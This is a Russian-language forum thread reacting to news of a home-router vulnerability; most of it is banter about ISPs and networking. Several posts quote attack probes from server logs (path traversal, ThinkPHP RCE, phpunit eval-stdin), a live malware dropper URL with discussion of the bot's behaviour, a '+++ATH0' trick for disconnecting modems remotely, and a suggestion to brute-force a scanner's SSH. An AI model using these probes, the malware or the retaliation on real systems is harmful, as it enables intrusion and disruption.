Обожаю такие новости: мы нашли уязвимость! с её помощью можно тырить деньги, воровать продукты с холодильника и отбирать у кота рыбу - это делается вот так!!!
Ответить | Правка | Наверх | Cообщить модератору

33. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +2 +/
Сообщение от Аноним (33), 09-Авг-21, 12:40 
А что такого, если ребята с опеннета подтянутся пользоваться этой уязвимостью, так у производителей роутеров появится большее желание дыры залатать.
Ответить | Правка | Наверх | Cообщить модератору

47. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 13:06 
Вот тут недавно Tor на Rust начали переписывать как раз благодаря анонимам с опеннета, так что - дерзайте!!
Ответить | Правка | Наверх | Cообщить модератору

49. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (52), 09-Авг-21, 13:08 
Скоро заценим есть ли жизнь на расте. Учитывая то с какой регулярностью ломают аппаратное декодирование в браузерах версия на Си сохранится как минимум еще очень долго.
Ответить | Правка | Наверх | Cообщить модератору

290. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (291), 11-Авг-21, 10:25 
А в торбраузере кто-то парится из-за аппаратного декодирования? Это ж небезопасно.
Ответить | Правка | Наверх | Cообщить модератору

168. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Аноним (-), 09-Авг-21, 19:26 
> Вот тут недавно Tor на Rust начали переписывать как раз благодаря анонимам
> с опеннета, так что - дерзайте!!

Недавно - это примерно года три назад? Так, если дерево сорцов позырить, потуги не очень новые.

Ответить | Правка | К родителю #47 | Наверх | Cообщить модератору

90. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Juha (ok), 09-Авг-21, 14:58 
Для этого надо зайти под root с полными правами и .....
Ответить | Правка | К родителю #24 | Наверх | Cообщить модератору

30. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Урри (ok), 09-Авг-21, 12:23 
Ко мне такие еще не стучались, но это просто так, потрындеть.

Зацените, кстати, какие школьники иногда стучатся:
GET////remote/fgt_lang?lang=/../../../..//////////dev/

Юзерагент зачетненький: python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.31.1.el7.x86_64, и айпишечка заодно: 45.95.147.15

Ответить | Правка | Наверх | Cообщить модератору

46. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (-), 09-Авг-21, 13:04 
Если к вам регулярно стучатся школьники, значит, с вашим именем сети (HalyavnyiInternet) или роутером что-то не так.
Ответить | Правка | Наверх | Cообщить модератору

48. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (52), 09-Авг-21, 13:07 
Воспитанные школьники стучатся. А не очень воспитанные сразу все отбирают.
Ответить | Правка | Наверх | Cообщить модератору

64. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Урри (ok), 09-Авг-21, 13:36 
Пытаются, пока только пытаются:

GET//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
GET//index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21
GET//?XDEBUG_SESSION_START=phpstorm
GET//wp-content/plugins/wp-file-manager/readme.txt
и т.д.

Ответить | Правка | Наверх | Cообщить модератору

219. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Ananimasss (?), 10-Авг-21, 00:33 
Больше похоже на ботнет, который переодически сканирует на уязвимости или неправильно настроенные вротпрессы.
Ответить | Правка | Наверх | Cообщить модератору

61. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Урри (ok), 09-Авг-21, 13:35 
Ну да, с роутером действительно не так - он к интернету подключен.
Вот если отключить, то и ломиться никто не будет.
Ответить | Правка | К родителю #46 | Наверх | Cообщить модератору

170. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 19:41 
> Вот если отключить, то и ломиться никто не будет.

Некоторые так и делают. Ставят открытую точку доступа, на отключенном роутере. Черт знает, троллинг любителей халявы наверное такой.

Ответить | Правка | Наверх | Cообщить модератору

194. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Атон (?), 09-Авг-21, 21:14 
так это ты каждый раз покупаешься на эту шутку?
Ответить | Правка | Наверх | Cообщить модератору

197. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 21:24 
> так это ты каждый раз покупаешься на эту шутку?

А, так это ты был? Ну тогда я тебе в следующий раз бутлоадер снесу, чтобы ты не скучал.

Ответить | Правка | Наверх | Cообщить модератору

205. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Атон (?), 09-Авг-21, 21:40 
я уже баюсь
Ответить | Правка | Наверх | Cообщить модератору

169. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 19:40 
> Юзерагент зачетненький: python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.31.1.el7.x86_64,
> и айпишечка заодно: 45.95.147.15

Что это за костяшки мамонта? Бомж нашел на помойке сервер? Так то у него openssh там светится. Может его сломали и это просто бот? Если не бот - ну, запусти ему туда брут ssh, для симметрии. Даже если ничерта не сбрутится, нагрузка на проц не оставит его равнодушным, если там RSA.

Ответить | Правка | К родителю #30 | Наверх | Cообщить модератору

34. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (34), 09-Авг-21, 12:40 
Что, неужели ДырЛинк не задет? :) Прям удивлен.
Ответить | Правка | Наверх | Cообщить модератору

43. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 12:59 
Мой ДырЛинк! Врага в тыл не пущу, сервер отключу!
...
Стоп, тут это невозможно сделать?
Ответить | Правка | Наверх | Cообщить модератору

100. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 15:19 
> Что, неужели ДырЛинк не задет? :)

Задет:

> Starting June 6, 2021, and through July 23, we have noticed this threat actor start exploiting other vulnerabilities:
> 1. CVE-2020-29557 (DLink routers)

https://blogs.juniper.net/en-us/security/freshly-disclosed-v...

Ответить | Правка | К родителю #34 | Наверх | Cообщить модератору

101. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 15:20 
021-20090-exploited-in-the-wild
Ответить | Правка | Наверх | Cообщить модератору

114. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (34), 09-Авг-21, 16:50 
Тот, на котором ты явно не умеешь писать.
Ответить | Правка | К родителю #34 | Наверх | Cообщить модератору

117. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от Нанобот (ok), 09-Авг-21, 17:02 
Фортран? Алгол? Пролог? Брейнфак? Я теряюсь в догадках...
Ответить | Правка | Наверх | Cообщить модератору

128. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +4 +/
Сообщение от Аноним (108), 09-Авг-21, 17:17 
Очевидно, что любой
Ответить | Правка | Наверх | Cообщить модератору

87. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (87), 09-Авг-21, 14:52 
> ADSL

А в dialup модемах ничего опасного не нашли? Если серьезно, уже лет 10 не слышал о них.

Ответить | Правка | Наверх | Cообщить модератору

109. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +2 +/
Сообщение от Аноним (-), 09-Авг-21, 15:57 
есть области аномальной топологии с медью на последней миле, а веризон в 2020 ещё мигрировал и планировал. так-то контра повырубала, конечно.
Ответить | Правка | Наверх | Cообщить модератору

134. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (-), 09-Авг-21, 17:26 
> А в dialup модемах ничего опасного не нашли?

Попробуй из JS сделать XHR на что-нибудь типа https://whatever/+++ATH0 какое-нибудь. Или картинку на таком адресе. На самом деле похрен что, главное чтобы какой-нибудь пакет от клиента в сеть содержал строку по типу +++ATH0.

Или любой другой подобный запрос. Если проканало - ну, ты можешь им полностью порулить. Некоторые GPRS/3G на это до сих пор ведутся. Фокус в том что +++ это escape sequence, переводит из режима передачи данных в режим команд и дальнейшее будет принято как команды. А ATH0 это AT-команда. Для диалапного оно трубку кладет, приятный способ поприветствовать юзера интернета. GPRSу или 3G можно что-то типа ATZ скормить, сброс настроек и реинициализация. Вероятно спихнет его с линка бонусом.

В оригинале Hayes это запатентовал, до +++ и после должна быть пауза. Однако остальные не могли юзать патент - и сделали без паузы. Сие годный вулн, позволяющий - полностью порулить удаленно, ага :).

Ответить | Правка | К родителю #87 | Наверх | Cообщить модератору

182. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 20:51 
FAIL: https => http:// конечно. Шифрование все портит.
Ответить | Правка | Наверх | Cообщить модератору

213. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Онаним (?), 09-Авг-21, 22:57 
Да хрен там, даже в хейесах был ATS2=255, и управление по DTR.
+++ это дебажный сиквенс, нормальные звонилки данных его в совместимых модемах умели выключать.
Ответить | Правка | К родителю #134 | Наверх | Cообщить модератору

243. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Аноним (-), 10-Авг-21, 11:56 
> Да хрен там, даже в хейесах был ATS2=255, и управление по DTR.

У большинства юзеров все это ессно не сделано. И работает. Иногда даже сейчас, хоть это и дико баянный баг. Хотя сейчас у модемов часто есть отдельный management UART или виртуальный UART, они все еще в общем случае кушают команды и понимают +++ на основном даталинке.

> +++ это дебажный сиквенс, нормальные звонилки данных его в совместимых модемах умели
> выключать.

Это переход из режима данных в режим команд, в нем нет ничего дебажного. Документированная фича, которую юзало хренова куча софта. Но без пауз оно таки в общем то вулн. Часто ремотно провоцируемый, если удалось убедить послать пакет с этим. Спихивание юзерей диалапа с линка - очень древняя забава. Можно и что по круче, типа стирания прошивки, если вендорские команды знаете.

Ответить | Правка | Наверх | Cообщить модератору

252. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Онаним (?), 10-Авг-21, 13:59 
Ну он дебажный потому, что сделан для ручного терминального режима, или когда нет сигнала DTR, чтобы коннект прибить, когда станет необходимо. В автоматическом же режиме коннект через DTR прибивается коннект целиком.

А так да, многие дефолтные строки инициализации прибивали, и в итоге оно работало, согласен.

Ответить | Правка | Наверх | Cообщить модератору

263. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 10-Авг-21, 18:25 
> Ну он дебажный потому, что сделан для ручного терминального режима, или когда
> нет сигнала DTR, чтобы коннект прибить, когда станет необходимо. В автоматическом
> же режиме коннект через DTR прибивается коннект целиком.

DTR сам по себе +++ не вырубал вроде. И это работало. Ну как, я делал вебпагу которая меня спихивала. Это было давно и настройки были обычные которые виндовый диалап юзал.

> А так да, многие дефолтные строки инициализации прибивали, и в итоге оно
> работало, согласен.

Да оно так то меня сшибало при тестах в виндовом диалапе. Команды там те которые он скармливал. По DTR отвал там был но реакция на +++ насколько я помню была, и даже сам диалап пытался этим пользоваться.

Ответить | Правка | Наверх | Cообщить модератору

268. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Онаним (?), 10-Авг-21, 21:04 
> DTR сам по себе +++ не вырубал вроде.

Угу. S2=255 обязательно. Имелось в виду, что при наличии DTR +++ уже не нужен.

> И это работало.

Работало, факт.

Ответить | Правка | Наверх | Cообщить модератору

305. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от пох. (?), 11-Авг-21, 14:07 
> Это переход из режима данных в режим команд, в нем нет ничего
> дебажного. Документированная фича, которую юзало хренова куча софта. Но без пауз
> оно таки в общем то вулн. Часто ремотно провоцируемый, если удалось

да, там какие-то идиоты на полном серьезе заявили "вероятность подобной последовательности в потоке данных крайне мала, хахахаха, мы подебили хейза!" - им в голову вот вообще не пришло попробовать это свое заявление пропихнуть через свой модем.

У менее идиотов этот "time independed escape" хотя бы выключался, но не все подебители хейза были столь продвинуты. У некоторых из-за ошибок даже предусмотренный выключатель умудрялся не выключать.

В общем-то, Хейз довольно быстро обанкротился, и никто по нему не плакал - потому что они и попытки запатентовать собственно at set делали. Немного не успели.

Ответить | Правка | К родителю #243 | Наверх | Cообщить модератору

154. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от пох. (?), 09-Авг-21, 18:20 
> Отойди на 100 км от любого миллионника на россии и обнаружишь сразу,
> что во всяких ПГТ кроме ADSL тебе могут предложить только 2G/3G

просто правильно выбирай маршруты отхода.

> Могу даже конкретный маршрут предложить. Направляйся от Нижнего Новгорода в сторону Мурома
> и смотри что в местных населенных пунктах доступно. В городишках, типа

и жалобу, жалобу в роснадзор!

По мурманской трассе вон - хоть и с дырками, но в основном 4g. Ну, если с трассы съехать - то да, можно заехать туда где вообще никакой связи нет, ну сам виноват, добро пожаловать на наш шашлык.

> тебе по блату притянут медь телефонную, если есть свободное место на АТСке

твои сведения, национал предатель, устарели лет на десять. Нет на тех атсках никакой меди, ее на жельтий порезали и сдали давно. Радиорелейка стоит. Потому что федеральные лицензии на частоты дают не просто так, а под клятву мамой дотянуться до жопы мира под Новым Уояном.

А в этом свете проводной телефон становится дорогим бесполезным ненужно.

А вместо adsl надо просто читать dsl. И вот он как раз в тех самых миллионниках, где еще не успели и телевизионную проводку на жельтий. Она плохо отжигается и возни много.

И модемы там с теми же самыми дырами.

Ответить | Правка | К родителю #134 | Наверх | Cообщить модератору

172. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от YetAnotherOnanym (ok), 09-Авг-21, 20:06 
Радости с того 4g, если qos там отстроен так, что у пацанчика на соседнем кресле ютуб играет ровненько, у барышни рядом инстаграмчик тоже летает, а тебе на какой-нибудь стаковерфлоу зайти или, там, госуслуги - воот такой хрен.
Ответить | Правка | Наверх | Cообщить модератору

178. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Онаним (?), 09-Авг-21, 20:37 
Ничего, ща ещё UDP'шный QUIC добавят, и ютуб с инстаграмчиком окончательно порвут любой QoS на ссаные тряпки. deny udp eq 80/443 в мобильных сетях войдёт в моду очень быстро.
Ответить | Правка | Наверх | Cообщить модератору

179. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (291), 09-Авг-21, 20:41 
> udp 80

Наноэксперт из Сколково стремительно врывается в дискуссию!

Ответить | Правка | Наверх | Cообщить модератору

212. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Онаним (?), 09-Авг-21, 22:49 
На всякий случай, от греха подальше.
Ибо нефиг.
Ответить | Правка | Наверх | Cообщить модератору

214. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Онаним (?), 09-Авг-21, 23:06 
[вкрадчиво] А зачем вам UDP 80? :D
Ответить | Правка | К родителю #179 | Наверх | Cообщить модератору

216. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Онаним (?), 09-Авг-21, 23:12 
Ну и ты меня блджад уел, я аж гуглить пошёл - откуда у меня в голове такое стойкое за порт 80.
Оказалось да, я видимо это уже читал. Ну и не мог я поверить, что эти архаровцы его не займут.

Короче...

https://www.ietf.org/proceedings/88/slides/slides-88-tsvarea...

Ищи port 80.

Такие вот тапки. Там у них на него разные были планы, включая разделение на in/out, но в итоге можно быть на 146% уверенным, что 80 без работы не останется.

Ответить | Правка | К родителю #179 | Наверх | Cообщить модератору

285. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (291), 11-Авг-21, 10:10 
> 2013

Очень актуально.

А у нас в 2021 реальные HTTP/3 серваки, типа caddy и nginx-quic, прекрасно без 80/udp обходятся.

Ответить | Правка | Наверх | Cообщить модератору

293. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Онаним (?), 11-Авг-21, 10:56 
Ключевое слово "у нас".
Это не значит, что "у других" те же планы.
Ответить | Правка | Наверх | Cообщить модератору

224. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от YetAnotherOnanym (ok), 10-Авг-21, 06:22 
> Ничего, ща ещё UDP'шный QUIC добавят, и ютуб с инстаграмчиком окончательно порвут
> любой QoS на ссаные тряпки. deny udp eq 80/443 в мобильных
> сетях войдёт в моду очень быстро.

Нифига. Хаватели развлекухи - основная ЦА мобильного интернета и основной источник дохода опсосов. Они уже сейчас дают на соцсети и мессенджеры безлимит, а на прочие ресурсы - дулю. И дальше будет хуже. Баранам, которые стадом идут туда, где их будут стричь - всё, всяким отщепенцам - крохи, которые останутся.

Ответить | Правка | К родителю #178 | Наверх | Cообщить модератору

248. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от пох. (?), 10-Авг-21, 13:02 
> Нифига. Хаватели развлекухи - основная ЦА мобильного интернета и основной источник дохода

ни разу.

> опсосов. Они уже сейчас дают на соцсети и мессенджеры безлимит, а

потому что соцсети и мессенджеры это _коммуникации_ а ни разу не "развлекуха".
За ютубчик будешь платить.

Ответить | Правка | Наверх | Cообщить модератору

269. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от YetAnotherOnanym (ok), 10-Авг-21, 21:32 
Ой, можно подумать, хомячки через соцсети не развлекухой обмениваются. Те же ролики из ютуба и тиктока, фотки с котиками и тому подобное.
Ответить | Правка | Наверх | Cообщить модератору

274. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от пох. (?), 10-Авг-21, 21:58 
Можно подумать, телефоном пользуются только тетяклава и ее кумушка.
Нет, не поверишь, по телефону тоже некоторые и рабочие вопросы решают.

Точно так и с соцсетями - это в первую очередь механизм общения. С кумушками или по работе - это у кого какая работа и сколько свободного времени. Но, учитывая состояние нынешнего рабовладельческого строя - легко предположить что таки по работе - в разы больше. А на кумушек те полтора часа между ужином и сном.

Ответить | Правка | Наверх | Cообщить модератору

91. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от YetAnotherOnanym (ok), 09-Авг-21, 14:58 
Санитизация? Нет, не слышали...
Ответить | Правка | Наверх | Cообщить модератору

127. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 17:17 
> http://212.192.241.72/lolol.sh

О, круто, живая малварь в дикой природе. И упаси вас это запускать. Впрочем, оно только 32-битный x86 умеет кажись. И кучу кроссплатформенного добра вплоть до аж sh4 какого.

Ответить | Правка | Наверх | Cообщить модератору

150. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от пох. (?), 09-Авг-21, 18:12 
>> http://212.192.241.72/lolol.sh
> О, круто, живая малварь в дикой природе. И упаси вас это запускать.

Чего это вдруг? Очень полезная и нужная малварь. Вон сколько троянцев пытается прибить перед установкой своего. Попутно прикрывает уязвимые порты от злых хакеров (если найдет немодный-устаревший iptables) и убивает уязвимые вредные сервисы.

> Впрочем, оно только 32-битный x86 умеет кажись.

в смысле, оно только 64bit native x86 и не умеет (видимо, надеется что и так запустится через 32бит прослойку)
а так все возможные и невозможные армы и мипсы.

> вплоть до аж sh4 какого.

во-во.

Только я не понял iptables-save в конце - это оно на какой-то глюк рассчитывает или это фича или отвалился хвост файла?


Ответить | Правка | Наверх | Cообщить модератору

175. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 09-Авг-21, 20:29 
> (если найдет немодный-устаревший iptables) и убивает уязвимые вредные сервисы.

Найдет, найдет. Сварщик, конечно, не настоящий - аплет бизибокса лайтовенький, но порты заварит :)

> в смысле, оно только 64bit native x86 и не умеет (видимо, надеется
> что и так запустится через 32бит прослойку)

Там ващет есть для него бинарь - но в скрипте ошибка или вредителем специально попорчено чтобы самого себя не взлАмать. Вот же: http://212.192.241.72/bins/dark.86_64 (ахтунг, х86_64 бинарь, запускать чревато). Просто команды даунлоада перед урлой нет.

Я его кстати распаковал (на армовской машине, конечно :P). А там пичалька, он обстрипаный и почищеный, версию нативного тулчейна нашару не узнаю. Но параметры те же что в армовской версии, у них всех айпи вхардкожен, так что если 212.192.241.72 вынести, оно, видимо, зубы дружно сломает. Тем более что там утюг апач всего лишь.

> а так все возможные и невозможные армы и мипсы.

А таки и для x86_64 тоже есть. Просто в скрипте отломано, возможно специально, чтобы себя не натянуть случайно.

> Только я не понял iptables-save в конце - это оно на какой-то
> глюк рассчитывает или это фича или отвалился хвост файла?

Это видимо попытка засэйвить параметры iptables, но я не в курсе кто это должен загружать.

А так малварина пытается обзывать себя nginx :D. И судя по строкам - периодически перекачивает и запускает вон тот гамноскрипт. Видимо, идея такая что его могут заменить и тогда бот новые команды получит.

Ответить | Правка | Наверх | Cообщить модератору

228. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от пох. (?), 10-Авг-21, 09:23 
> Там ващет есть для него бинарь - но в скрипте ошибка или
> вредителем специально попорчено чтобы самого себя не взлАмать.

как будто у него не найдется 32битного ld.so?

> Я его кстати распаковал (на армовской машине, конечно :P). А там пичалька,
> он обстрипаный и почищеный, версию нативного тулчейна нашару не узнаю. Но

почем, говорите, нонче idapro ? ;-)

> А таки и для x86_64 тоже есть. Просто в скрипте отломано, возможно
> специально, чтобы себя не натянуть случайно.

или руки из жопы. Судя по iptables таки да.

> Это видимо попытка засэйвить параметры iptables, но я не в курсе кто

оно их в консоль выдаст. Ну или в cron в который оно себя пихает в пяти экземплярах. Сомневаюсь что к нему в гуанороутере приделан mta, поэтому результат уедет в /dev/null

то ли товарищ не понимал в принципе что эта команда делает, то ли перепутал с древним редхатовским скриптом в rc.d, то ли конец файла битый, то ли есть гуанороутер у которого есть такая команда и это не тот iptables-save что у всех.

> А так малварина пытается обзывать себя nginx :D. И судя по строкам

а как надо было? thttpd, наверное?

Ответить | Правка | Наверх | Cообщить модератору

250. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (-), 10-Авг-21, 13:30 
> как будто у него не найдется 32битного ld.so?

А кто знает? Я даже его систему не знаю: х64 бинарник почищен. Видимо не совсем нуб. Но с кроссами похоже лажа. Хотел x86 позырить, в надежде что с -m32 нативом собрали и забыли стрипеуть, но толи слишком успешно идет и опач ниасилил, толи снесли, толи намек про "утюг" поняли, в общем скачать не удалось. По коду пусть аверы гадают, они бабки получают.

И это, у меня вон того нет. Зачем оно в 64-бит системе? Чтобы запускать малварь? :))

> почем, говорите, нонче idapro ? ;-)

А хрен знает, зачем оно мне теперь? Кст, сорец mirai на гитхабе был, а может и есть, врядли сильно отличается. Я так понимаю, "инновацией" вместо бинарных лоадеров этот шелл. Он же и "CnC питекантропа" похоже. Бинари, как я понимаю, периодически перекачивают и запускают это же "трололо". Оно выносит старого и качает нового. Наверное так и получает инструкции. Не буду я его дизасмить - прикидка по строкам из блобов, 75% что угадал.

> или руки из жопы. Судя по iptables таки да.

Да на самом деле у многих этих штук FS наглухо RO (в сквош писать еще никто не научился) а изменения в RAM висят и оно один хрен до ребута живет. Так что отвоевать взад роутер в 90% случаев можно отцепив сеть (на случай если активно летает) и ребутнув роутер. Ну он и испарится, вместе с правилами айпитаблеса.

> оно их в консоль выдаст.

А ее там все-равно читать некому. Может пытались что-то изобразить но не доделали?

> Ну или в cron в который оно себя пихает в пяти экземплярах. Сомневаюсь что
> к нему в гуанороутере приделан mta, поэтому результат уедет в /dev/null

Оно вообще какое-то странное. Может отлаживали на х86 и большом компе а потом кой-как обкромсали под бизибокс и мелочь, откуда и странная хрень?

> файла битый, то ли есть гуанороутер у которого есть такая команда
> и это не тот iptables-save что у всех.

Возможно. Я все роутеры и их систему конфигурации не знаю. А может просто забытые останки какого-то эксперимента. В оригинале этого шелскрипта вроде не было, походу "инновация".

>> А так малварина пытается обзывать себя nginx :D. И судя по строкам
> а как надо было?

Ну, нжинкс на хомякомыльнице все же довольно необычно.

> thttpd, наверное?

Да можно просто httpd. Ты там что, сорец mirai скачал? Не советую, АНБ, ФСБ и прочие моссады с ми6 в очередь за головой встанут, а с такой технологией кулхацкер не долго ныкаться сможет, имхо и имеет все шансы быть отловленым. Даже сильно поддосить не успеет пожалуй. Так то "anna senpai" попался вроде. Хоть и попортил крови Кребсу, которого послала клаудфларь, которая типа защита, но типа иди-ка ты, Кребс, с гигабитами которые на тебя льют.

Ответить | Правка | Наверх | Cообщить модератору

174. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Онаним (?), 09-Авг-21, 20:27 
SH4 это забавная зверюга. Это хитачевский SuperH, который ныне делают Renesas и STM, то есть да, в качестве целей явно значатся промышленные сети ("ну, типа IoT") в т.ч. и малые роутеры внутри таковых.
Ответить | Правка | К родителю #127 | Наверх | Cообщить модератору

148. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноньимъ (ok), 09-Авг-21, 18:11 
Огласите весь список роутеров пожалуйста.
Ответить | Правка | Наверх | Cообщить модератору

173. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Онаним (?), 09-Авг-21, 20:18 
https://securityaffairs.co/wordpress/120908/hacking/cve-2021...
Ответить | Правка | Наверх | Cообщить модератору

217. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноньимъ (ok), 09-Авг-21, 23:24 
> https://securityaffairs.co/wordpress/120908/hacking/cve-2021...
>wordpress

Там живой троян мне в браузер полезет? Страшно как-то.

Ответить | Правка | Наверх | Cообщить модератору

218. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +1 +/
Сообщение от Онаним (?), 09-Авг-21, 23:25 
А ты его в гугл транслейт, пусть гуглу лезет :D
Ответить | Правка | Наверх | Cообщить модератору

229. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –1 +/
Сообщение от пох. (?), 10-Авг-21, 09:25 
> А ты его в гугл транслейт, пусть гуглу лезет :D

ты ему вредные советы-то не давай, он же нам гугля сломает.

Ответить | Правка | Наверх | Cообщить модератору

244. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноньимъ (ok), 10-Авг-21, 12:00 
Загрузил не через трансллейт, а напрямую через гугол.
Ждите пылающих датацентров.
Ответить | Правка | Наверх | Cообщить модератору

301. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Онаним (?), 11-Авг-21, 13:40 
Последняя VPS для загрузки в OVH была, да? :)
Ответить | Правка | Наверх | Cообщить модератору

245. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноньимъ (ok), 10-Авг-21, 12:01 
Что-то список маленький удивительно.

Они туда "устаревшие" железки без поддержки видимо не включили.

Ответить | Правка | К родителю #173 | Наверх | Cообщить модератору

176. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (181), 09-Авг-21, 20:31 
О, моё любимое. Очередной вагон не обновляемых домашних коробочек, куда напихали свистелок и перделок, а также backdoor и bloatware. Mmmm, delicious.
Ответить | Правка | Наверх | Cообщить модератору

183. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (183), 09-Авг-21, 20:54 
Так то ты в своем праве обучить хомячков азам консоли. Или даже выезжать настраивать им роутер. Но, правда, денег за это тебе никто не заплатит.
Ответить | Правка | Наверх | Cообщить модератору

187. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
Сообщение от Аноним (181), 09-Авг-21, 21:06 
А я и не собираюсь ничем подобным заниматься. :) Несовершенство этого мира, жадность и шпионство корпораций, нехватка знаний большинства населения, воровство хакеров - я воспринимаю как повод повеселиться на эту тему. Кстати, да, есть пару IT-профессий (support, InfoSec и хакеры), которые на этих проблемах делают деньги, а ряд людей в итоге учат что-то новое(OpenWRT/Linux, OPNsense/FreeBSD, настройка/админство сетей) и покупают приличное железо. Экономика растёт, позитив же. :)
Ответить | Правка | Наверх | Cообщить модератору

230. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  –2 +/
Сообщение от пох. (?), 10-Авг-21, 09:30 
> есть пару IT-профессий (support, InfoSec и хакеры), которые на этих проблемах
> делают деньги

есть пара не-ит профессиий - наркомафия, товарищмайоры-борцуны-с-наркомафией у нее же на зарплате, , продавцы и производители метадона, наконец, которые делают гораздо лучшие и большие деньги. Иногда садятся на недетские сроки, но чаще прокатывает. Последнюю категорию могут еще и наградить, за трудовой подвиг.
А ряд людей в итоге учится чему-то новому - как бороться с героиновым отходняком, например. И покупают приличные препараты. Экономика... ну так себе, если честно... Да и с позитивом на хмуром не очень.

А можно и просто квартиры обносить. Ряд людей (потупее) научится новому, дверь себе купит поприличнее. Поумнее - уедут туда где квартиры обносить не принято.

Ответить | Правка | Наверх | Cообщить модератору

242. "Уязвимость в домашних маршрутизаторах, охватывающая 17 произ..."  +/
